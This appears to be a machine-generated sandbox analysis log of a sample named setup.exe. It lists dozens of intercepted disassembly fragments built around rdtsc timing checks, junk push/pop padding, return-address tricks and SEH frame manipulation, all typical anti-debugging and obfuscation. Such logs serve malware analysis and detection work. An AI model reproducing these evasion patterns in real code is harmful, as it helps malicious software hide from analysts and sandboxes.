Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E86D3B second address: E86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E86D3F second address: E86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8AFA1 second address: E8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8AFA7 second address: E8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4F44DD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FE0B4F44DC8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007FE0B4F44DCBh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8905A second address: E89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE0B4522B16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8A07E second address: E8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8B22F second address: E8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8F686 second address: E8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FE0B4F44DC8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E90628 second address: E9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FE0B4522B18h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007FE0B4522B1Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9165A second address: E9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9165F second address: E91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE0B4522B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4349A second address: E434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E434B7 second address: E434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E434BB second address: E434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007FE0B4F44DE1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007FE0B4F44DCFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E94A14 second address: E94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE0B4522B27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E94A30 second address: E94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E94A3D second address: E94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E917DC second address: E917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E917E1 second address: E91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4522B28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E91804 second address: E91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E971EE second address: E971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E91808 second address: E9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FE0B4F44DCCh 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FE0B4F44DC8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007FE0B4F44DCCh 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FE0B4F44DC8h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007FE0B4F44DCCh 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9189B second address: E918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE0B4522B16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9086C second address: E90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E90873 second address: E90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9911F second address: E99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FE0B4F44DCCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E99148 second address: E991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE0B4522B1Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FE0B4522B18h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007FE0B4522B21h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E991A9 second address: E991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FE0B4F44DCFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9730C second address: E97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E97310 second address: E97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E97314 second address: E9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9731A second address: E973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0B4F44DC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FE0B4F44DC8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FE0B4F44DC8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007FE0B4F44DCFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007FE0B4F44DCCh 0x0000006d je 00007FE0B4F44DCCh 0x00000073 je 00007FE0B4F44DC6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007FE0B4F44DC8h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E973BE second address: E973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B21h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E973D3 second address: E973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9E40E second address: E9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4522B28h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E9E42C second address: E9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DCEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3E469 second address: E3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3E470 second address: E3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3E47B second address: E3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA21BD second address: EA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA68FF second address: EA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE0B4522B16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA9009 second address: EA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4F44DD6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FE0B4F44DD6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA9044 second address: EA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E32AD2 second address: E32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD183 second address: EAD193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FE0B4522B16h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8AC second address: EAD8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8B0 second address: EAD8B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8B4 second address: EAD8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE0B4F44DCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8CA second address: EAD8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8D0 second address: EAD8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8D4 second address: EAD8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8D8 second address: EAD8E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAD8E6 second address: EAD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3C9D4 second address: E3C9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE0B4F44DD9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E813FE second address: E814C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov ecx, edi 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FE0B4522B18h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b sub di, DF1Bh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 jmp 00007FE0B4522B26h 0x0000003c mov dword ptr [ebp+1249606Ch], esp 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 call 00007FE0B4522B18h 0x0000004a pop eax 0x0000004b mov dword ptr [esp+04h], eax 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc eax 0x00000058 push eax 0x00000059 ret 0x0000005a pop eax 0x0000005b ret 0x0000005c or edx, dword ptr [ebp+122D3966h] 0x00000062 cmp dword ptr [ebp+122D3A7Ah], 00000000h 0x00000069 jne 00007FE0B4522C0Ch 0x0000006f mov byte ptr [ebp+122D1CCBh], 00000047h 0x00000076 jc 00007FE0B4522B1Bh 0x0000007c mov edi, 0105AA21h 0x00000081 mov eax, D49AA7D2h 0x00000086 call 00007FE0B4522B1Fh 0x0000008b mov dword ptr [ebp+122D1C3Ch], ecx 0x00000091 pop edx 0x00000092 nop 0x00000093 push eax 0x00000094 push edx 0x00000095 jne 00007FE0B4522B18h 0x0000009b pushad 0x0000009c popad 0x0000009d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E81BF9 second address: E81BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E81BFF second address: E81C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E820A1 second address: E820C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FE0B4F44DD1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FE0B4F44DC6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E820C7 second address: E820D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4522B1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E820D6 second address: E820DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E82520 second address: E82524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E82524 second address: E8252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8252A second address: E82534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FE0B4522B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E825BD second address: E825C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E825C1 second address: E8268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FE0B4522B2Fh 0x0000000c jmp 00007FE0B4522B29h 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FE0B4522B18h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov ecx, dword ptr [ebp+12482FD4h] 0x00000033 lea eax, dword ptr [ebp+12496058h] 0x00000039 jnl 00007FE0B4522B30h 0x0000003f nop 0x00000040 pushad 0x00000041 push eax 0x00000042 jmp 00007FE0B4522B29h 0x00000047 pop eax 0x00000048 jc 00007FE0B4522B18h 0x0000004e push edi 0x0000004f pop edi 0x00000050 popad 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007FE0B4522B25h 0x00000059 jl 00007FE0B4522B16h 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FE0B4522B22h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E8268A second address: E826EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FE0B4F44DC8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D235Ch], edi 0x00000028 lea eax, dword ptr [ebp+12496014h] 0x0000002e mov edx, dword ptr [ebp+122D38F2h] 0x00000034 nop 0x00000035 ja 00007FE0B4F44DE3h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E826EA second address: E826EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA897 second address: EBA8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8A0 second address: EBA8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE0B4522B16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8AA second address: EBA8B4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE0B4F44DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8B4 second address: EBA8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8BC second address: EBA8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8C0 second address: EBA8F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FE0B4522B28h 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 ja 00007FE0B4522B1Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007FE0B4522B16h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC10DD second address: EC10EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EC10EE second address: EC10FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFAB3 second address: EBFAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FE0B4F44DC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFAC5 second address: EBFAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBFAD0 second address: EBFAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FE0B4F44DC6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007FE0B4F44DCCh 0x00000014 rdtsc
